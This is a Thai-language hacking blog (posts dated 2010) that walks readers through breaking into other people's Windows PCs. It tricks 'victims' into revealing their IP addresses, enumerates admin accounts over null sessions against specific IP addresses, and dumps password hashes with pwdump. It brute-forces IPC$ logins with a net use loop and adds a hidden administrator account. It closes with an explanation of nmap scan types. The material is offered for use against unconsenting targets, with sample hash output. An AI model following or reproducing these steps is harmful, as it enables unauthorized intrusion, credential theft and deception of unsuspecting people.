บรรทัดที่ 2 จะเป็นการทำให้ ชื่อ user ที่ชื่อ hacker ที่เราได้ทำไปในบรรทัดที่ 1 นั้นเป็น Administrator (ให้เติมตัว “s” ลงไปที่ท้าย Administrator ด้วยดังตัวอย่างที่ผมเขียน)

หลังจากที่คุณได้สร้างคำสั่งเพิ่ม user ด้านบนนี้แล้ว คุณจะยังไม่สามารถใช้ user ตัวที่คุณสร้างใหม่ได้จนกว่า เครื่องเหยื่อได้มีการ ล็อกเอาท์ออกไปก่อน โดยคุณอาจส่งโปรแกรม shutdown ไปที่เครื่องเหยื่อก่อน แล้วสั่ง shutdown แต่คุณต้องจำชื่อเครื่องด้วยนะครับ เพราะว่าครั้งต่อไปที่ต่อเน็ต คุณลองแสกนหาชื่อเครื่องนั้นๆให้เจอก่อน แล้วค่อยเข้าไปโดย user ที่คุณได้ตั้งมาใหม่ด้วยคำสั่ง net use ในดอส หรืออาจทำการ Map Drive ก็ได้

Map Drive คือการที่เอาไดรว์ของเครื่องเป้าหมาย มาอยู่ในเครื่องคุณเอง ซึ่งจะเปรียบเหมือนว่าเป็นไดรว์ตัวนึง ในเครื่องคุณเองครับ ซึ่งเมื่อทำสำเร็จแล้ว คุณจะเห็นไฟล์ทุกอย่างในเครื่องเป้าหมายในเครื่องคุณเอง สามารถ copy ย้าย ได้ แต่ ขอเตือน ว่า ถ้ารันโปรแกรมในหน้าต่าง Win Explorer นั้น หมายถึงเป็นการ รันโปรแกรมที่เครื่องคุณนะครับ ไม่ใช่เครื่องเป้าหมาย

วันอังคารที่ 7 กันยายน พ.ศ. 2553

การเข้าถึงระบบ

BF (Brute Force)


ในที่นี้ผมจะกล่าวถึงว่า การที่จะเจาะไปในเครื่องอื่นๆนั้นเราจะต้องมีการเตรียมตัวอย่างไร เช่น เครื่องมือต่างๆ และก็ ข้อมูลต่างๆที่ได้มาจากบทความก่อนหน้านี้ เพราะถ้า สิ่งแวดล้อมต่างๆไม่เอื้ออำนวยแช่นเรื่องการเปิด share ในไดร์ฟต่างๆหรือ port 139,445 ต่างๆ (ก็คือการป้องกันที่ดี) จะทำให้การเจาะนั้นยากยิ่งขึ้น และ user Admin ก็ต้องมีการตั้ง password ที่ซับซ้อน ในหัวเรื่องนี้ผมจะเน้นวิธีการดึงเอา password ของ Admin ในเครื่องเหยื่อ

ข้อหลักๆในการ HACK

- *- ใช้ระบบใดอยู่ Window อะไร หรือ Linux , Unix เพื่อที่คุณจะได้หาเครื่องมือ (โปรแกรม) ที่เหมาะสมกับระบบ เพราะถ้าเครื่องมือมันต่างระบบกัน มานก็ใช้มะได้นะ

- *- Port ที่เปิดใช้ ก็สามารถบอกได้เหมือนกันว่าเป็นระบบไหน แต่บางเครื่องที่ผู้ดูแลฉลาด มักจะเปิด port หลอกๆ ก็มี หรือบางทีคุณอาจเจอเครื่องเป้าหมายนั้นได้เปิด port โทรจันหรือโปรแกรม remote (ถ้าคุณรู้ว่า port ที่เปิดนั้น ใช้โปรแกรมไหน) คุณอาจใช้โปรแกรมนั้น เชื่อมต่อได้เลย

- *- ชื่อผู้ใช้ในเครื่อง เราจะต้องสนแต่ชื่อ Admin เท่านั้นและเครื่องเหยื่อนั้น ก็ต้อง login เป็น admin อยู่ด้วย เวลา hack เข้าไปเพราะถ้าเป็นชื่อ user แบบอื่นๆ เข้าไปได้ ก็ไม่มีสิทธิ์อะไรในการจัดการเครื่องอยู่ดีครับ และ เวลาจะ hack คุณก็ต้องล็อกอินในเครื่องคุณด้วย user admin ด้วยครับ

- *- ไฟล์ password ที่คุณทำขึ้นเอง หรือหาเอาจากในแผ่น ของผมก็ได้ และผมได้ให้โปรแกรมสร้างไฟล์ password มาพร้อมกับแผ่นด้วย ไฟล์ password นั้นสำคัญมากที่สุดในการ hack คุณต้องใส่ใจเรื่องนี้พอสมควรเพราะมันจะเป็นกุญแจที่จะเข้าไปในเครื่องเป้าหมาย

________________________________________

Password Dump

PwDump เป็นอีกโปรแกรมหนึ่งซึ่งแสบไม่ใช่เล่นๆ คิกๆ โปรแกรมนี้ใช้สำหรับดัมพ์เอารหัสผ่านจาก Registry ของเครื่องเหยื่อออกมาเป็นไฟล์ text แล้วจากนั้นก็เอามา crack password ด้วยโปรแกรม LC4 , LC5 , John The Ripper , Cracker Jack ตามถนัด ซึ่งตอนนี้ pwdump เท่าที่ทราบมี 3 เวอร์ชั่น และเวอร์ชั่นแรก เจ้งกระบ้งไปแร้ว เหอๆ เพราะใช้อะไรไม่ค่อยได้ มาเริ่มละเลงกันดีกว่า พร่ามไปเยอะไม่ดี

pwdump2 (หากันเอาเองนะ ตามร้านกูเกิ้ล)

เวอร์ชั่นนี้ จำเป็นมากๆที่ต้องส่งไปรันที่เครื่องเหยื่อ คือ ต้องไปนั่งอยู่หน้าเครื่องเหยื่อได้ หรือ remote,ขโมยหน้าต่างดอส ที่เครื่องเหยื่อมาสำเร็จก่อนและคุณต้องแน่ใจว่าคุณได้ส่งไฟล์นี้ไปที่เครื่องเหยื่อเรียบร้อยแล้ว วิธีการใช้งานก็พิมพ์ที่ดอสครับ อย่างแรกเลยให้ copy ไฟล์ pwdump2.exe และ samdump.dll ไปเก็บที่เครื่องเหยื่อให้ได้เสียก่อน จากตัวอย่างผมได้ copy 2 ไฟล์นี้ไว้ที่ C:\> เฉยๆนะ

กรณีนี้คือ เมื่อเปิดดอสมาแล้วจากรูปด้านล่าง(หรือได้ขโมยหน้าต่างดอสจากเครื่องเหยื่อได้มาแล้ว) มันดันไปอยู่ที่โฟล์เดอร์อื่นๆ ให้คุณพิมพ์ cd\ มันจะย้ายมาที่ C:\> ทันทีแล้วเรียกโปรแกรม แต่ถ้าเปิดมาแล้วอยู่ที่ C:\> คุณก็พิมพ์ pwdump2 ได้เลย


จากนั้นโปรแกรมก็จะ ทำการ dump password เครื่องนั้น และผลลัพธ์ ก็จะเห็นประมาณนี้



ตรงผลลัพธ์ที่ได้คือ


Administrator:500:1c6de50fc9b54e412f46dea65daa01b4b0:9ca21572a7544491fe0cae2fcdcc4

2a4:::

Guest:501:aad3b8435b51404eeaafd3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

sophia:1003:aafd3b435b51404efeaad3b435b51404ee:31d6cfe0d16a4e931b73c59d7e0c089c0:::

__vmware_user__:1001:aadf3b435b51404eefaad3b435b51404ee:64c0f1869d05f2df7fbaa64af1

526af4:::

ให้คุณเซฟเป็นไฟล์ .txt หรือไฟล์ text นั่นเอง จากนั้นก็เอามา crack password ด้วยโปรแกรม LC4,LC5,John The Ripper,Cracker Jack ตามถนัด คิกๆ

pwdump3 หรือ pwdump3e

และก่อนที่จะใช้โปรแกรม PwDump3 คุณจะต้องสร้าง connection ไปที่เครื่อง 203.209.120.190 แบบ anonymous หรือ null session โดยการพิมพ์ net use \\203.209.120.190\IPC$ ""u"" แล้วกด Enter

การที่จะทำวิธีนี้ได้ เครื่องเหยื่อต้องเปิด port 139,445 ก่อนหรือเปิด share $IPC นั่นเองครับ


 
ส่วนเวอร์ชั่นนี้ คุณสามารถที่จะรันโปรแกรมจากระยะไกลไ้ครับ แต่ข่าวร้ายของ hacker คิกๆ คุณต้องจำเป็นต้องมีสิทธิ์เทียบเท่า Admin ในเครื่องเหยื่อ ว้าแย่จัง ตรงนี้ถ้าว่าวกันซื่อๆ คือ remote,ขโมยหน้าต่างดอส ที่เครื่องเหยื่อมาสำเร็จก่อน เหอๆ ไม่งั้นแห้วครับท่าน ส่วนการใช้โปรแกรม เหมือนเดิม copy ไปไว้ที่ไหนก็ได้ในเครื่องคุณ หรือไปไว้ที่ C:\> แล้วทำแบบนี้
 
 
ตรง 192.0.0.1 ต้องเป็น IP ของเครื่องหยื่อน๊า ไม่ใช่ของเครื่องคุณเอง แล้วผลลัพธ์ก็จะเหมือนโปรแกรม pwdump2 และก็ทำเหมือนๆกัน


________________________________________

การ HACK แบบใช้ดอส

ก่อนจะใช้คำสั่งนี้ คุณต้องรู้ชื่อ Admin จากเครื่องเหยื่อให้ไ้ก่อนจากโปรแกรม Pwdump ไม่งั้น คุณอาจยิง password กันทั้งชาติ คิกๆ หลังจากนั้นให้คุณสร้างโฟล์เดอร์ ซึ่งจากตัวอย่าง ผมได้สร้าง Folder ชื่อ Hack ที่ dirve C: และใน Folder ชื่อ Hack ให้คุณเก็บไฟล์ password ต่างๆเอาไว้หรืออาจเป็นไฟล์อื่นๆ ที่ใช้ในการ hacking ด้วยก็ได้ ควรที่จะทำเป็น Folder ที่พิมพ์ง่ายๆ และเร็ว เพื่อที่จะเรียกใช้งานได้สะดวก

จากนั้นคุณก็หาไฟล์ password หรือจะสร้างขึ้นเองก็ได้จากโปรแกรมที่ผมได้ให้ไป เอามาใส่ไว้ที่ C:\Hack> หรือที่ Folder Hack (คุณอาจสร้างขึ้นมาเป็นชื่ออื่นก็ได้) เพราะเวลาใช้คุณจะต้องมีการอ้างที่อยู่ไฟล์ที่ถูกต้องนั่นเอง และยิ่งคุณมีไฟล์ password ที่ หลากหลายเท่าไหร่ ความสำเร็จก็มีมากขึ้นครับ แต่ถ้าเครื่องคุณอาจยังคงมีการเชื่อมต่อแบบ anonymous หรือ null session ให้คุณยกเลิกคำสั่งการเชื่อมต่อไปก่อนด้วยคำสั่งด้านล่างนี้ แล้วค่อยลงมือ Brute Force ในแบบฉบับดอส


*** ( วิธีการยกเลิกการเชื่อมต่อ พิมพ์ในดอสว่า net use * /d /y ) ***

จากคำสั่งด้านบนนี้ เป็นการใช้คำสั่ง for เป็นตัววนลูบร่วมกับ net use เพื่อที่จะหา password ในเครื่อง 203.114.234.5 ถ้าอธิบายอย่างละเอียดคือ คำสั่งข้างต้นนี้ จะส่งไฟล์ pass.txt โดยแยกเอา string ในแต่ละบรรทัดในไฟล์ pass.txt ซึ่งเป็นคำต่างๆ(รหัสผ่านจากรูปด้านล่าง) จากนั้นก็ได้แทนค่าลงไปที่ %i จากนั้นคำสั่ง net use จะพยายาม connect (เชื่อมต่อ) ไปที่ share ที่ชื่อ IPC$ในเครื่อง 203.114.234.5 คือ port 139 นั่นเอง แล้วจะส่งค่ารหัสผ่าน ชื่อผู้ใช้ Admin และรหัสผ่าน %i ที่อยู่ในไฟล์ pass.txt


pass.txt เป็นไฟล์ password ที่สำหรับเก็บคำต่างๆ เอาไว้เพื่อเดา password ของ Admin ในเครื่องเป้าหมาย ซึ่งต้องมีอยู่ในที่ Folder Hack และที่อยู่ในและข้างในไฟล์ password จะเป็นแบบนี้ สมมติรูปด้านล่างนี้คือไฟล์ pass.txt



การ Hack แบบโปรแกรม


SMBgrid เป็นอีกหนึ่งโปรแกรมที่เป็นเครื่องมือแบบ Brute Force การใช้งานนั้น ไม่ยากอย่างที่คิด การใช้โปรแกรมแบบนี้จะง่ายต่อการใช้งานคือ คุณอาจไม่ต้องรู้ข้อมูลอะไรมากมายในเครื่องเหยื่อ แค่คุณได้ชื่อ Admin จากวิธีการด้านบนมากับมีไฟล์ password ที่เป็น text file ก็สามารถใช้โปรแกรมนี้ได้แล้ว หน้าตาโปรแกรมก็เชยๆ อยากให้ลองเอาไปเล่นกันดูครับ

วันอาทิตย์ที่ 5 กันยายน พ.ศ. 2553

การเก็บรายละเอียด เพื่อแฮคเกอร์

แฮคเกอร์

การเก็บรายละเอียด


(Enumeration)

วิธีการมีอยู่หลายวิธีครับ ผมจะยกตัวอย่าง 3 ตัวอย่างนะครับ

วิธี1 วิธีนี้เป็นการหา IP เครื่องเหยื่อโดยการหลอกล่อ (กรณีที่เหยื่อรู้มาก ไม่กล้ารับ/ส่งไฟล์เพราะจะทำให้รู้ IP ได้ เอ้อ..เซ็งเจง)คุณเลยต้องหาวิธีนี้โดย ไปเซตที่เมล์คุณเองก่อนครับ เพื่อให้เมล์คุณ นั้น แสดง IP จากเครื่องต่างๆที่ได้ส่งเมล์มาหาเมล์คุณโดย ให้คุณเข้าไปที่เมล์คุณก่อน จากนั้นหาปุ่ม Option ตามรูปด้านล่างนี้ครับ

 
กดที่option แล้วจะเห็นเป็นแบบรูปข้างล่างนี้
 
 
 
 
แล้วก็มาเลือกหัวข้อตามรูปด้านล่าง
 
หลังจากที่เซตแล้ว เมื่อคุณได้รับเมล์มาจะแสดงรายละเอียดต่างๆดังรูปด้านล่างที่กรอบสีน้ำเงิน ซึ่งจะบอกรายละเอียดต่างๆ จากเครื่อง server ที่เป็นตัวนำส่งเมล์มาและรวมทั้ง IP ที่ส่งมาให้คุณ (หรือเครื่องที่ส่งเมล์มา) โดยคุณสังเกตุหน้าบรรทัดที่มีคำว่า Recived : from ดูรูปด้านล่างประกอบ


 
วิธีนี้จะทำให้เผย IP ของเครื่องเหยื่อ โดยการที่คุณไปหลอกล่อเหยื่อให้ส่งเมล์มาหาคุณ


วิธี2 Chat จาก MSN โดยตอนที่คุณ กำลัง รับ /ส่งไฟล์อยู่นั้น(หลอกล่อนิดหน่อย) สามารถที่จะรู้ว่า IP เครื่องที่เรากำลัง รับ/ส่งไฟล์นั้น เป็น IP อะไร โดยดูได้จากโปรแกรม Essential Net Tools หรือที่หัวข้อ Netstat คือตอนก่อนที่จะ รับ/ส่ง ไฟล์นั้นให้เปิดหรือเรียก netstat ขึ้นมาก่อน จากนั้นสังเกตดู ว่าเมื่อเราเริ่ม ส่งไฟล์นั้น มี IP ไหนเพิ่มขึ้นมามั่ง หรือมาเกาะเครื่องของคุณ ซึ่งหาหรือเดาได้ไม่ยาก
วิธี3 ใช้เทคนิคการ Ping Sweep เพื่อใช้หาเครื่องเหยื่อในวงแลน ที่คุณกำลังใช้อยู่

การหาชื่อ USER Administrator ในเครื่องเป้าหมาย


การที่คุณจะทำขั้นตอนนี้ได้ คุณต้องทำการแสกนเครื่องเป้าหมายให้ได้เสียก่อน และเครื่องเป้าหมายนั้นๆ จะต้องเปิด port 139,445 กับ Admin จะต้อง login ใช้งานอยู่ด้วยนะครับ ไม่งั้นอด ซึ่งบางเครื่องนั้นอาจไม่ได้เปิด port ที่ผมได้กล่างมาข้างต้น หมายถึงว่า อาจมีการติดตั้ง Service Pack ที่อับเดทล่าสุดไว้แล้ว ซึ่งบางทีอาจเปิด port 139,445 เอาไว้แต่ก็มีการป้องกัน หรือมีโปรแกรม Firewall อยู่ เรื่องแบบนี้ถ้าถอดใจ ก็นั่งดูรูปโป้ก็แล้วกันครับ คิกๆ เอ้า..สรุปให้อีกทีก็ได้ (กฎเหล็กของการล้วงตับมี 3 ประการ)


- เครื่องเหยื่อจะต้องเปิด port 139,445 หรือแชร์ $IPC ถ้ายัง งง ไปอ่าเรื่องการแสกน

- Admin จะต้อง login ใช้งานอยู่ด้วย

- และคุณก็ต้อง login เป็น Admin ด้วยน๊า

เรื่องอุปสรรค์นั้นสำหรับ Hacker นั้นเป็นสิ่งที่จะต้องเจอ มันไม่สวยหรูง่ายดายเหมือนหนังที่เค้าแสดง ซึ่งถ้าอยากเป็น Hacker จะต้องลองทำดู ถ้ามันมี เปอร์เซ็นต์อยู่ก็ต้องลองทำ แต่ผมขอบอกก่อนว่า ถึงแม้จะมี SP and Firewall ที่ดีก็ตามก็ใช่ว่าจะเจาะไม่ได้นะ ขอบอก คิกๆ เพราะว่ามีอีกหลายๆวิธี ซึ่งถ้าคุณรู้วิธีการยิ่งมาก และการหัดใช้โปรแกรมต่างรวมถึงการทดลองจริงๆ ซึ่งแต่ละบุคคลจะมีวิธีการที่ถนัดแตกต่างกันอยู่แล้ว มาเริ่มกันเลย

ให้คุณไปหาโปรแกรม CAIN หรือโปรแกรม USER2SID.EXE กับ SID2USER.EXE มาใส่ไว้ในเครื่องก่อนครับ หรืออาจเป็นโปรแกรม ENUM.EXE ในที่นี้ผมจะไม่อธิบายโปรแกรม CAIN นะครับ แต่โปรแกรม CAIN นั้นทำงานแบบ auto ซึ่งไม่จำเป็นต้องใช้ความรู้อะไรมากมาย เพียงแต่เปิดโปรแกรมขึ้นมากดไม่กี่ปุ่ม ก็ได้ชื่อ Admin มาแล้ววว

เมื่อคุณได้โปรแกรม USER2SID.EXE กับ SID2USER.EXE หรือ ENUM.EXE มาแล้วให้แตกไปไว้ที่โฟล์เดอร์ใดๆ (ขอบอกว่า สร้างโฟล์เดอร์ที่แบบเข้าง่ายๆ พิมพ์ง่ายๆ ไม่ต้องซับซ้อน) หรือจะเอามาไว้ที่ ไดร์ฟ ซี C:\> เฉยๆก็ได้ครับ ในกรณีผมผมใส่ไปที่ C:\Hack> จ้า

 
จากรูปด้านบน ผมเข้าไปที่โฟลเดอร์ HACK และก่อนที่จะใช้โปรแกรม user2sid และ sid2user คุณจะต้องสร้าง connection ไปที่เครื่อง 203.209.120.190 แบบ anonymous หรือ null session โดยการพิมพ์ net use \\203.209.120.190\IPC$ ""u"" แล้วกด Enter


*** ( วิธีการยกเลิกการเชื่อมต่อ พิมพ์ในดอสว่า net use * /d /y ) ***

เป็นการเชื่อมต่อไปยังเครื่องเหยื่อ IP = 203.209.120.190 ที่ port 139 หรือ IPC$ นั่นเอง

โดยจะมีข้อความว่า The command completed successfully. ดังรูปบนนี้  จากนั้นให้พิมพ์ตามรูปด้านล่างนี้ ผมพิมพ์ว่า user2sid \\203.209.120.190 kmitnb-vvnn4ti8 แล้ว Enter


ซึ่ง kmitnb-vvnn4ti8 นั้นคือชื่อเครื่องของ 203.209.120.190 หรือเรียกอีกอย่างว่า “Domain User”


 

ให้ดูตรง S-1-5-21-448539723-261903793-1801674531 ตรงนี้สำคัญมาก เป็นเลขรหัสที่สำหรับใช้ดู user ของ Admin จากเครื่องเหยื่อครับ

จากนั้นเราจะใช้งานโปรแกรม SID2USER.EXE ในการดู User Admin เครื่องเหยื่อโดยการพิมพ์ตามข้างล่างนี้

เวลาใช้เราต้องเอาค่าต่างๆตรง S-1-5-21-448539723-261903793-1801674531 มาใช้ด้วยครับ แต่ต้องแปลงนิดนึงโดย ตัวที่เป็นเครื่องหมายลบ ให้เอาออก และทำเป็นช่องว่างแทน จากนั้นตัว S-1 ก็ไม่ต้องนำมาใช้

ตัวอย่าง

จากที่คุณใช้ user2sid.exe คุณจะได้ค่านี้มา S-1-5-21-448539723-261903793-1801674531

เวลาใช้คำสั่ง sid2user.exe ให้คุณเพิ่มเลข 5 ที่ตัวท้ายสุดแล้วเว้นวรรค 1 ครั้งใส่ 500 ลงไปท้ายสุด ผลที่ได้

จะเป็น sid2user \\203.209.120.190 5 21 448539723 261903793 1801674531

 
โปรแกรมก็จะบอกชื่อ Admin มาโดยดี

วันเสาร์ที่ 4 กันยายน พ.ศ. 2553

การสแกน เพื่อการแฮคเกอร์

การสแกน


(Scaning)     (ดาวน์โหลด nmap-3.93-win32 ไปก่อนนะครับ )

Port Scanning เป็นหนึ่งในเทคนิคที่โด่งดังที่สุดที่ผู้โจมตีใช้ในการค้นหาบริการ Service ที่พวกเขาจะสามารถเจาะผ่านเข้าไปยังระบบๆได้ โดยปกติแล้วทุก ๆ ระบบที่ต่อเข้าสู่ระบบ LAN หรือระบบอินเทอร์เน็ตจะเปิด service อยู่บน port ที่เปิดเป็นตัวเลขต่างๆสำหรับการทำ Port Scanning นั้น ผู้โจมตีจะสามารถค้นหาข้อมูลได้มากมายจากระบบของเป้าหมาย ได้แก่ บริการอะไรบ้างที่กำลังรันอยู่ ผู้ใช้คนไหนเป็นเจ้าของบริการเหล่านั้น สนับสนุนการล็อกอินด้วย anonymous (แบบไม่ประสงค์ออกนาม)หรือไม่ และบริการด้านเครือข่ายมีการทำ authentication หรือไม่ การทำ Port Scanning ทำได้โดยการส่งข้อความหนึ่งไปยังแต่ละพอร์ต ณ เวลาหนึ่ง ๆ ผลลัพธ์ที่ตอบสนองออกมาจะแสดงให้เห็นว่าพอร์ตนั้น ๆ ถูกใช้อยู่หรือไม่และสามารถทดสอบดูเพื่อหาจุดอ่อนต่อไปได้หรือไม่ Port Scanners มีความสำคัญต่อผู้ชำนาญด้านความปลอดภัยของเครือข่ายมากเพราะว่ามันสามารถเปิดเผยจุดอ่อนด้านความปลอดภัยที่มีความเป็นไปได้ของระบบเป้าหมาย

ถึงแม้ว่า Port Scans สามารถเกิดขึ้นกับระบบของคุณ แต่ก็สามารถตรวจจับได้และก็สามารถใช้เครื่องมือที่เหมาะสมมาจำกัดจำนวนของข้อมูลเกี่ยวกับบริการที่เปิดได้ ทุกๆระบบที่เปิด สู่สาธารณะจะมีพอร์ตหลายพอร์ตที่เปิดและพร้อมให้ใช้งานได้ (ต้องรู้ว่าแต่ละ port ที่เิปิดนั้นคือบริการอะไร) ซึ่งตรงนี้คุณต้องทำการกำหนดสิทธิ์ต่างในแต่ละ port และจำกัดจำนวนพอร์ตที่จะเปิดให้แก่ผู้ใช้ที่ได้รับอนุญาตและปฏิเสธการเข้าถึงมายังพอร์ตที่ปิด

เทคนิคต่าง ๆ ของ Port Scan

ก่อนที่คุณจะป้องกัน Port Scans คุณก็จะต้องเข้าใจเสียก่อนว่า Port Scans ทำงานอย่างไร เนื่องจากมีเทคนิคของ Port Scanning อยู่มากมายหลายรูปแบบ ซึ่งมีเครื่องมือ Port Scanning ที่ทำงานโดยอัตโนมัติ เช่น Nmap และ Nessus ที่ผมแนะนำโปรแกรม 2 ตัวนี้ก็เพราะว่าโปรแกรม 2 ตัวนี้มีความยืดหยุ่นในการแสกนสูง สามารถกำหนดรูปแบบการแสกนได้อย่างอิสระ ไม่เหมือนกับโปรแกรมทั่วๆไปที่แสกนได้ไม่กี่อย่างๆ

________________________________________

การ scan ต่อไปนี้เป็นรูปแบบมาตรฐานสำหรับ Nmap และ Nessus

1. Address Resolution Protocol (ARP) scans จะตรวจหาอุปกรณ์ที่ทำงานในเครือข่ายโดยการส่งชุดของ ARP broadcasts และเพิ่มค่าของฟิลด์ที่บรรจุ IP address ของเป้าหมายในแต่ละ broadcast packet การ scan ชนิดนี้จะได้รับผลตอบสนองจากอุปกรณ์ที่มี IP บนเครือข่ายออกมาในรูปแบบของ IP address ของแต่ละอุปกรณ์ การ scan แบบนี้จึงทำการ map out ได้ทั้งเครือข่ายอย่างมีประสิทธิภาพ

2.The Vanilla TCP connect scan เป็นเทคนิคการ scan แบบพื้นฐานและง่ายที่สุด คือจะใช้ connect system call ของระบบปฏิบัติการไปบนระบบเป้าหมายเพื่อเปิดการเชื่อมต่อไปยังทุก ๆ พอร์ตที่เปิดอยู่ การ scan ชนิดนี้สามารถจับได้ง่ายมาก โดยล็อก (log) ต่าง ๆ ของระบบที่เป็นเป้าหมายจะแสดงการร้องขอการเชื่อมต่อ (connection requests ) และข้อความแสดงข้อผิดพลาด (error messages) สำหรับบริการที่ตอบรับการเชื่อมต่อนั้น

3.The TCP SYN (Half Open) scans เทคนิคนี้บางครั้งถูกเรียกว่า half open เพราะว่าระบบที่ทำการโจมตีไม่ได้ปิดการเชื่อมต่อที่ได้เปิดไว้ scanner จะส่ง SYN packet ไปยังเป้าหมายและรอการตอบสนอง ถ้าพอร์ตถูกเปิดไว้เป้าหมายก็จะส่ง SYN/ACK กลับมา แต่ถ้าพอร์ตถูกปิดอยู่ เป้าหมายก็จะส่ง RST กลับมา วิธีการ scan รูปแบบนี้ยากต่อการตรวจจับ ปกติเครื่องที่เป็นเป้าหมายจะทำหน้าที่ปิดการเชื่อมต่อที่เปิดไว้ และส่วนใหญ่จะไม่มีระบบการล็อกที่เหมาะสมในการตรวจจับการ scan ชนิดนี้

4.The TCP FIN scan เทคนิคนี้สามารถที่จะทะลุผ่านไฟล์วอลล์ ส่วนใหญ่, packet filters , cละโปรแกรมตรวจจับการ scan ไปได้โดยไม่ถูกตรวจพบ เพราะระบบที่ทำการโจมตีจะส่ง FIN packets ไปยังระบบของเป้าหมาย สำหรับพอร์ตต่าง ๆ ที่ปิดอยู่จะตอบสนองกลับไปด้วย RST ส่วนพอร์ตที่เปิดจะไม่สนใจ packets เหล่านั้นเลย ดังนั้นเครื่องที่ทำการโจมตีก็จะได้ข้อมูลว่ามันได้รับ RST จากพอร์ตไหนบ้างและไม่ได้ RST จากพอร์ตไหนบ้าง

5.The TCP Reverse Ident scan เป็นเทคนิคที่สามารถตรวจหาชื่อของเจ้าของแต่ละโพรเซสที่เป็นการเชื่อมต่อด้วย TCP บนเครื่องเป้าหมาย การ scan ชนิดนี้จะทำให้ระบบที่ทำการโจมตีสามารถเชื่อมต่อเข้าไปยังพอร์ตที่เปิดอยู่และใช้ ident protocol ในการค้นหาว่าใครเป็นเจ้าของโพรเซสบนเครื่องเป้าหมายได้

6.The TCP XMAS ถูกใช้เพื่อหาพอร์ตบนเครื่องเป้าหมายที่อยู่ในสถานะ listening โดยจะส่ง TCP packet ที่มี flag เป็น URG, PSH และ FIN ใน TCP header ไปยังพอร์ตของเครื่องเป้าหมาย ถ้าพอร์ต TCP ของเครื่องเป้าหมายปิดอยู่ พอร์ตนั้นก็จะส่ง RST กลับมา แต่ถ้าพอร์ตเปิดอยู่ก็จะไม่สนใจ packet นั้นเลย

7.The TCP NULL scan เทคนิคนี้จะส่ง TCP packet ที่มี sequence number แต่ไม่มี flag ออกไปยังเครื่องเป้าหมาย ถ้าพอร์ตปิดอยู่จะส่ง กลับมา RST packet กลับมา แต่ถ้าพอร์ตเปิดอยู่ ก็จะไม่สนใจ packet นั้นเลย

8.The TCP ACK scan เป็นเทคนิคที่ใช้ค้นหาเว็บไซต์ที่เปิดบริการอยู่ แต่ปฏิเสธการตอบสนองต่อ ICMP ping หรือค้นหากฎ (rule) หรือนโยบาย ( policy) ต่าง ๆ ที่ตั้งไว้ที่ไฟล์วอลล์เพื่อตรวจสอบดูว่าไฟล์วอลล์สามารถกรอง packet อย่างง่าย ๆ หรือเทคนิคชั้นสูง โดยการ scan แบบนี้จะใช้ TCP packet ที่มี flag เป็น ACK ส่งไปยังพอร์ตเครื่องปลายทาง ถ้าพอร์ตเปิดอยู่ เครื่องเป้าหมายจะส่ง RST กลับมา แต่ถ้าปิดอยู่ก็จะไม่สนใจ packet นั้น

9.The FTP Bounce Attack ใช้โพรโตคอล ftp สำหรับสร้างการเชื่อมต่อบริการ ftp ของ proxy วิธีการ scan แบบนี้ ผู้โจมตีจะสามารถซ่อนตัวอยู่หลัง ftp server และ scan เป้าหมายอื่น ๆ ได้โดยไม่ถูกตรวจจับ ดังนั้น ftp servers ส่วนใหญ่จะมีการ disable บริการของ ftp เพื่อความปลอดภัยของระบบ

10.The UDP ICMP port scan ใช้โพรโตคอล UDP ในการ scan หาพอร์ตหมายเลขสูง ๆ โดยเฉพาะในระบบ Solaris แต่จะช้าและไม่น่าเชื่อถือ

11.The ICMP ping-sweeping scan จะใช้คำสั่ง ping เพื่อกวาดดูว่ามีระบบไหนที่เปิดใช้งานอยู่ เครือข่ายส่วนใหญ่จึงมีการกรองหรือ disabled

โพรโตคอล ICMP เพื่อความปลอดภัยของระบบ
________________________________________

เทคนิคการ Ping Sweep

ในบทความต่อไปนี้ ผมจะมุ่งประเด็นเกี่ยวกับเรื่องการแสกนว่ามีเรื่องไหนยัง login อยู่หรือกำลังใ้ช้งาน และ port ต่างที่เครื่องเหยื่อไ้ด้เิปิดเอาไว้ จากบทความของผม เวลาุคุณจะต้องสนใจเครื่องของเหยื่อที่ port 139 กับ 445 เท่านั้น เพราะเ็ป็นส่วนจำเป็นในการ Hack Window

คือการ ping ไปยังเครื่องเป้าหมายที่จำนวนมากๆ ในวง Network ที่คุณใช้อยู่ หรือวง lan นั่นเอง (ใน Internet ก็ใช้ได้) โดยแสกนพร้อมๆกัน คล้ายกับการกราดยิง เพื่อตรวจสอบว่าเครื่องปลายทางได้เปิดอยู่หรือไม่ก็ตาม เช่นคุณมี IP x.y.z.6 ตรง x.y.z อาจเป็นตัวเลขใดๆก็ได้ แต่เลข 6 คือเลขชุดหลังของ ip คุณ เวลาคุณแสกนหาให้เขียนลงไปดังนี้ x.y.z.0/24 จากตรงเลข 6 เปลี่ยนเป็น 0/24 หมายความว่าเป็นการแสกน IP ตั้งแต่ x.y.z.1- x.y.z.255
ยกตัวอย่าง


สมมติคุณกำลังต่อเน็ต หรือกำลังใช้คอมอยู่ในวงแลน ให้คุณเิดหน้าต่างดอสขนึ้มา (หรือ Start > Run พิมพ์ cmd.exe) พอหน้าต่างดอสขนึ้มาให้คุณพิมพ์ ipconfig แล้วกด Enter


172.16.66.1 ถึง 172.16.66.225 ครับผม แต่เวลาแสกนถ้าคุณมากำหนดเป็นตัวเลขอาจต้องพิมพ์แบ่งช่วงเอาเอง แต่ถ้าคุณจะแสกน port ทั้งวงแลน คือ แสกนมันทุกเครื่องในวงแลนเลย เวลาคุณกำหนด IP ก็ต้องใ้คำสั่งกำหนด เป็น 172.16.66.0/24 โดยปรกติ ถ้าคุณใช้คำสั่ง ping ธรรมดา จะมีการส่ง ICMP ECHO (Type 8) ออกไปยังเครื่องปลายทางและรอคอย ICMP ECHO_REPLY (Type 0) ส่งกลับมา ถึงแม้ ping จะมีประโยชน์ในการทดสอบว่าเครื่องปลายทางนั้นเปิดอยู่หรือไม่ก็ตาม แต่มันจะเหมาะกับ Network ขนาดเล็กและขนาดกลางเท่านั้น ซึ่งถ้ามาใช้ในใน Network ขนาดใหญ่อย่าง Internet มักจะใช้ได้ไม่มีประสิทธิภาพ โดยใช้ –sP เป็นการ ping scan (กรณีนี้ผมไ้ด้ เอาโปรแกรม nmap มาแตกใส่ไว้ที่ไดร์ฟ C:)


C:>nmap –sP 172.16.66.0/24

